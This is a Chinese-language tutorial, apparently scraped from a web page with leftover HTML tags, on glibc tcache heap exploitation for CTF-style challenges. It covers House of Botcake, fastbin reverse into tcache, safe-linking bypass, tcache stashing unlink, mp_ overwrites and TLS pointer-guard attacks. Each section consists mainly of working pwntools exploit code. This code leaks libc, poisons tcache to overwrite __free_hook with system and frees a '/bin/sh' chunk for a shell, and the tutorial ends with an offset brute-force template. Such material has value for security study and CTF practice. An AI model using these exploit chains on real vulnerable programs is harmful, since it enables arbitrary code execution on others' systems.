Tcache攻击手法全面解析<\/h1>

House of Botcake<\/h2>

核心原理<\/h3>
构造一个chunk同时存在于unsorted bin和tcache中<\/li>
通过unsorted bin修改该chunk的next值为__free_hook<\/code><\/li>
使得tcache结构变为：chunk -> __free_hook<\/code><\/li>
通过两次malloc实现任意地址写<\/li>
<\/ul>
利用条件<\/h3>

需要有UAF漏洞<\/li>
chunk list不被清空即可，mark标记影响不大<\/li>
<\/ul>
典型利用步骤<\/h3>

填充tcache bin链表<\/li>
将一个chunkA free到unsorted bin中<\/li>
将chunkA的prev chunk(chunkB) free掉，使A、B合并<\/li>
申请一个chunk在tcache bin中给chunkA留下空间<\/li>
再次free chunkA，使其既在unsorted bin又在tcache中<\/li>
通过unsorted bin修改chunkA的fd指针指向__free_hook<\/code><\/li>
两次malloc实现任意地址写<\/li>
<\/ol>
示例代码<\/h3>
# 填充tcache<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(7<\/span>):
<\/span><\/span>    add(i, 0x80<\/span>, 'a'<\/span>)
<\/span><\/span>
<\/span><\/span>add(7<\/span>, 0x80<\/span>, 'a'<\/span>)
<\/span><\/span>add(8<\/span>, 0x80<\/span>, 'a'<\/span>)
<\/span><\/span>add(9<\/span>, 0x20<\/span>, 'b'<\/span>)
<\/span><\/span>
<\/span><\/span># 清空tcache<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(7<\/span>):
<\/span><\/span>    delete(i)
<\/span><\/span>
<\/span><\/span>delete(8<\/span>)
<\/span><\/span>show(8<\/span>)
<\/span><\/span>libc_base =<\/span> u64(p.<\/span>recvuntil('<\/span>\x7f<\/span>'<\/span>)[-<\/span>6<\/span>:].<\/span>ljust(8<\/span>, '<\/span>\x00<\/span>'<\/span>)) -<\/span> 0x1ecbe0<\/span>
<\/span><\/span>__free_hook =<\/span> libc_base +<\/span> libc.<\/span>sym["__free_hook"<\/span>]
<\/span><\/span>system_addr =<\/span> libc_base +<\/span> libc.<\/span>sym["system"<\/span>]
<\/span><\/span>
<\/span><\/span># 触发unlink<\/span>
<\/span><\/span>delete(7<\/span>)
<\/span><\/span>add(10<\/span>, 0x80<\/span>, 'a'<\/span>)
<\/span><\/span>
<\/span><\/span># 再次free使chunk同时在unsorted bin和tcache中<\/span>
<\/span><\/span>delete(8<\/span>)
<\/span><\/span>
<\/span><\/span># tcache poison攻击<\/span>
<\/span><\/span>payload =<\/span> 'a'<\/span>*<\/span>0x80<\/span> +<\/span> p64(0<\/span>) +<\/span> p64(0x91<\/span>) +<\/span> p64(__free_hook)
<\/span><\/span>add(11<\/span>, 0xa0<\/span>, payload)
<\/span><\/span>add(12<\/span>, 0x80<\/span>, '\/bin\/sh<\/span>\x00<\/span>'<\/span>)
<\/span><\/span>add(13<\/span>, 0x80<\/span>, p64(system_addr))
<\/span><\/span>delete(12<\/span>)
<\/span><\/span><\/code><\/pre>Fastbin Reverse into Tcache<\/h2>
低版本(libc 2.27-2.31)<\/h3>

填满tcache<\/li>
放7个chunk进fastbin<\/li>
将第一个放进fastbin的chunk的fd改成目标地址<\/li>
清空tcache<\/li>
申请一个fastbin出来，将target链入tcache头部<\/li>
<\/ol>
高版本(libc 2.32+)<\/h3>

对tcache和fastbin的fd指针进行加密<\/li>
加密方式：当前chunk地址>>12<\/code>与fd值异或<\/li>
需要先计算目标地址与地址>>12<\/code>的异或值<\/li>
<\/ul>
示例代码<\/h3>
# 修改tcache count<\/span>
<\/span><\/span>add(0<\/span>)
<\/span><\/span>add(1<\/span>)
<\/span><\/span>free(0<\/span>)
<\/span><\/span>free(1<\/span>)
<\/span><\/span>heap =<\/span> heapbase +<\/span> 0x10<\/span>
<\/span><\/span>edit(1<\/span>, p64(xor^<\/span>heap))
<\/span><\/span>add(0<\/span>)
<\/span><\/span>add(0<\/span>)
<\/span><\/span>edit(0<\/span>, p64(0<\/span>))
<\/span><\/span>
<\/span><\/span># 填充fastbin<\/span>
<\/span><\/span>add(1<\/span>)  # change fd<\/span>
<\/span><\/span>add(2<\/span>)  # full fastbin<\/span>
<\/span><\/span>free(1<\/span>)
<\/span><\/span>edit(0<\/span>, p64(2<\/span>))
<\/span><\/span>edit(1<\/span>, p64(xor^<\/span>heapbase+<\/span>0x90<\/span>))
<\/span><\/span>add(1<\/span>)
<\/span><\/span>add(1<\/span>)
<\/span><\/span>
<\/span><\/span># 填满tcache<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(7<\/span>):
<\/span><\/span>    edit(0<\/span>, p64(0<\/span>))
<\/span><\/span>    add(2<\/span>)
<\/span><\/span>    edit(0<\/span>, p64(i))
<\/span><\/span>    free(2<\/span>)
<\/span><\/span>
<\/span><\/span>edit(0<\/span>, p64(0<\/span>))
<\/span><\/span>add(2<\/span>)
<\/span><\/span>edit(0<\/span>, p64(7<\/span>))
<\/span><\/span>free(2<\/span>)
<\/span><\/span>edit(2<\/span>, p64(xor^<\/span>(io_list_all+<\/span>0x70<\/span>)))
<\/span><\/span>
<\/span><\/span># 用tcache中的chunk填满fastbin<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(6<\/span>):
<\/span><\/span>    add(2<\/span>)
<\/span><\/span>    edit(0<\/span>, p64(7<\/span>))
<\/span><\/span>    free(2<\/span>)
<\/span><\/span>    edit(0<\/span>, p64(6<\/span>-<\/span>i))
<\/span><\/span>
<\/span><\/span>edit(0<\/span>, p64(0<\/span>))
<\/span><\/span>edit(1<\/span>, p64(io_list_all>><\/span>12<\/span>))
<\/span><\/span>
<\/span><\/span># 触发fastbin reverse into tcache<\/span>
<\/span><\/span>add(2<\/span>)
<\/span><\/span><\/code><\/pre>Decrypt Safe Unlink<\/h2>
libc 2.32+变化<\/h3>

增加了对next域的限制<\/li>
需要稍作修改才能利用<\/li>
<\/ul>
示例代码<\/h3>
add(0x60<\/span>, 'a'<\/span>*<\/span>0x10<\/span>)  #0<\/span>
<\/span><\/span>add(0x60<\/span>, 'b'<\/span>*<\/span>0x10<\/span>)  #1<\/span>
<\/span><\/span>delete(0<\/span>)
<\/span><\/span>show(0<\/span>)
<\/span><\/span>heap_base =<\/span> u64(p.<\/span>recv(5<\/span>).<\/span>ljust(8<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>))<<<\/span>12<\/span>
<\/span><\/span>
<\/span><\/span>add(0x60<\/span>, 'b'<\/span>)  #2<\/span>
<\/span><\/span>delete(1<\/span>)  # tcache 0x70: 0=2->1<\/span>
<\/span><\/span>delete(0<\/span>)
<\/span><\/span>
<\/span><\/span># 填充tcache<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(3<\/span>, 11<\/span>):
<\/span><\/span>    add(0x80<\/span>, 's'<\/span>)
<\/span><\/span>
<\/span><\/span>add(0x10<\/span>, 'prevent chunk'<\/span>)
<\/span><\/span>for<\/span> i in<\/span> range(3<\/span>, 11<\/span>):
<\/span><\/span>    delete(i)
<\/span><\/span>
<\/span><\/span>show(10<\/span>)
<\/span><\/span>libc_base =<\/span> u64(p.<\/span>recvuntil('<\/span>\x7f<\/span>'<\/span>)[-<\/span>6<\/span>:].<\/span>ljust(8<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>)) -<\/span> 0x1e3c00<\/span>
<\/span><\/span>free_hook =<\/span> libc_base +<\/span> libc.<\/span>symbols['__free_hook'<\/span>]
<\/span><\/span>sys_addr =<\/span> libc_base +<\/span> libc.<\/span>symbols['system'<\/span>]
<\/span><\/span>value =<\/span> ((heap_base +<\/span> 0x2a0<\/span>)>><\/span>12<\/span>) ^<\/span> free_hook
<\/span><\/span>
<\/span><\/span>edit(2<\/span>, p64(value))
<\/span><\/span>add(0x60<\/span>, '\/bin\/sh<\/span>\x00<\/span>'<\/span>)
<\/span><\/span>add(0x60<\/span>, p64(sys_addr))
<\/span><\/span>delete(12<\/span>)
<\/span><\/span><\/code><\/pre>Tcache Stashing Unlink Attack<\/h2>
核心原理<\/h3>

获得任意地址target_addr的控制权<\/li>
在任意地址target_addr写入大数值<\/li>
<\/ol>
利用条件<\/h3>

需要UAF漏洞<\/li>
主要适用于只有calloc并且可以分配tcache大小的chunk的情况<\/li>
<\/ul>
典型利用步骤<\/h3>

让tcache中有6个目标大小的chunk<\/li>
通过切割unsorted bin来得到smallbin的堆块<\/li>
控制smallbin的bk指针<\/li>
触发tcache stashing unlink attack<\/li>
<\/ol>
示例代码<\/h3>
# 让tcache中有6个0xb0的chunk<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(6<\/span>):
<\/span><\/span>    calloc(0xa0<\/span>)
<\/span><\/span>    free(i)
<\/span><\/span>
<\/span><\/span># 通过切割unsorted bin来得到smallbin的堆块<\/span>
<\/span><\/span>calloc(0x4b0<\/span>)  #9<\/span>
<\/span><\/span>calloc(0xb0<\/span>)   #10<\/span>
<\/span><\/span>free(9<\/span>)        # 此时smallbin有1个0xb0的chunk<\/span>
<\/span><\/span>calloc(0x400<\/span>)
<\/span><\/span>calloc(0x4b0<\/span>)  #11<\/span>
<\/span><\/span>calloc(0xb0<\/span>)   #12<\/span>
<\/span><\/span>free(11<\/span>)       # 此时smallbin有2个0xb0的chunk<\/span>
<\/span><\/span>calloc(0x400<\/span>)  #13<\/span>
<\/span><\/span>
<\/span><\/span># 修改smallbin的bk指针<\/span>
<\/span><\/span>edit(11<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>*<\/span>0x400<\/span> +<\/span> p64(prev_size) +<\/span> p64(size) +<\/span> p64(heapbase+<\/span>0xb00<\/span>) +<\/span> p64(target_addr-<\/span>0x10<\/span>))
<\/span><\/span>
<\/span><\/span># 触发tcache stashing unlink attack<\/span>
<\/span><\/span>calloc(0xa0<\/span>)
<\/span><\/span><\/code><\/pre>修改mp_结构体<\/h2>
核心原理<\/h3>

修改mp_.tcache_bins<\/code>值让tcache中的bin数变多<\/li>
使largebin进入tcache<\/li>
通过修改tcache的entries实现任意地址写<\/li>
<\/ul>
典型利用步骤<\/h3>

泄露libc基址和heap基址<\/li>
计算mp_.tcache_bins<\/code>地址<\/li>
通过largebin attack修改mp_.tcache_bins<\/code><\/li>
修改tcache的entries指向目标地址<\/li>
malloc获取目标地址的控制权<\/li>
<\/ol>
示例代码<\/h3>
# 泄露libcbase<\/span>
<\/span><\/span>add(1<\/span>, 0x500<\/span>)
<\/span><\/span>add(2<\/span>, 0x600<\/span>)
<\/span><\/span>add(3<\/span>, 0x700<\/span>)
<\/span><\/span>delete(1<\/span>)
<\/span><\/span>delete(3<\/span>)
<\/span><\/span>add(4<\/span>, 0x700<\/span>)
<\/span><\/span>show(1<\/span>)
<\/span><\/span>out =<\/span> u64(p.<\/span>recv(6<\/span>).<\/span>ljust(8<\/span>, b<\/span>"<\/span>\x00<\/span>"<\/span>))
<\/span><\/span>libcbase =<\/span> out -<\/span> libc.<\/span>sym['__malloc_hook'<\/span>] -<\/span> 1168<\/span> -<\/span> 0x10<\/span>
<\/span><\/span>free_hook =<\/span> base +<\/span> libc.<\/span>sym['__free_hook'<\/span>]
<\/span><\/span>system =<\/span> base +<\/span> libc.<\/span>sym['system'<\/span>]
<\/span><\/span>
<\/span><\/span># largebin attack修改mp_.tcache_bins<\/span>
<\/span><\/span>mp_offset =<\/span> 0x1e3280<\/span>
<\/span><\/span>mp_ =<\/span> libcbase +<\/span> mp_offset
<\/span><\/span>target =<\/span> mp_ +<\/span> 0x50<\/span>
<\/span><\/span>
<\/span><\/span>add(15<\/span>, 0x500<\/span>)  # take out 1<\/span>
<\/span><\/span>add(5<\/span>, 0x700<\/span>)   # chunk1<\/span>
<\/span><\/span>add(6<\/span>, 0x500<\/span>)
<\/span><\/span>add(7<\/span>, 0x6f0<\/span>)    # chunk2<\/span>
<\/span><\/span>add(8<\/span>, 0x500<\/span>)
<\/span><\/span>delete(5<\/span>)
<\/span><\/span>add(9<\/span>, 0x900<\/span>)
<\/span><\/span>show(5<\/span>)
<\/span><\/span>fd =<\/span> u64(p.<\/span>recv(6<\/span>).<\/span>ljust(8<\/span>, b<\/span>"<\/span>\x00<\/span>"<\/span>))
<\/span><\/span>edit(5<\/span>, p64(fd)*<\/span>2<\/span> +<\/span> p64(0<\/span>) +<\/span> p64(target-<\/span>0x20<\/span>))
<\/span><\/span>delete(7<\/span>)
<\/span><\/span>add(10<\/span>, 0x900<\/span>)
<\/span><\/span>
<\/span><\/span># 修改tcache entries<\/span>
<\/span><\/span>edit(1<\/span>, p64(0<\/span>)*<\/span>13<\/span> +<\/span> p64(free_hook))
<\/span><\/span>add(3<\/span>, 0x500<\/span>)
<\/span><\/span>edit(3<\/span>, p64(system))
<\/span><\/span>edit(6<\/span>, b<\/span>'\/bin\/sh<\/span>\x00<\/span>'<\/span>)
<\/span><\/span>delete(6<\/span>)
<\/span><\/span><\/code><\/pre>TLS相关攻击<\/h2>
修改线程tcache变量<\/h3>

TLS区域有一个线程变量tcache<\/li>
可以用largebin attack修改tcache变量控制tcache分配<\/li>
指向的位置是heapbase+0x10，即tcache_perthread_struct结构从counts开始的地方<\/li>
<\/ul>
pointer guard加密<\/h3>

加密方式：rol(ptr ^ pointer_guard, 0x11, 64)<\/code><\/li>
解密方式：ror(enc, 0x11, 64) ^ pointer_guard<\/code><\/li>
加密使用的key来自fs:[offsetof(tcbhead_t, pointer_guard)]<\/code><\/li>
<\/ul>
远程爆破TLS<\/h3>

当ld.so距离libc基址的位置不确定时<\/li>
爆破偏移值的末四位和第五位数（末三位不变）<\/li>
示例爆破模板：<\/li>
<\/ul>
for<\/span> x in<\/span> range(0x10<\/span>):
<\/span><\/span>    for<\/span> y in<\/span> range(0x10<\/span>):
<\/span><\/span>        try<\/span>:
<\/span><\/span>            libc_base =<\/span> 0x1234<\/span>
<\/span><\/span>            offset =<\/span> 0x6<\/span> <<<\/span> 20<\/span>
<\/span><\/span>            offset +=<\/span> x <<<\/span> 16<\/span>
<\/span><\/span>            offset +=<\/span> y <<<\/span> 12<\/span>
<\/span><\/span>            ld_base =<\/span> libc_base +<\/span> offset
<\/span><\/span>            log.<\/span>success("try offset:<\/span>\t<\/span>"<\/span> +<\/span> hex(offset))
<\/span><\/span>            # your code<\/span>
<\/span><\/span>            sh.<\/span>interactive()
<\/span><\/span>        except<\/span> EOFError<\/span>:
<\/span><\/span>            sh.<\/span>close()
<\/span><\/span><\/code><\/pre>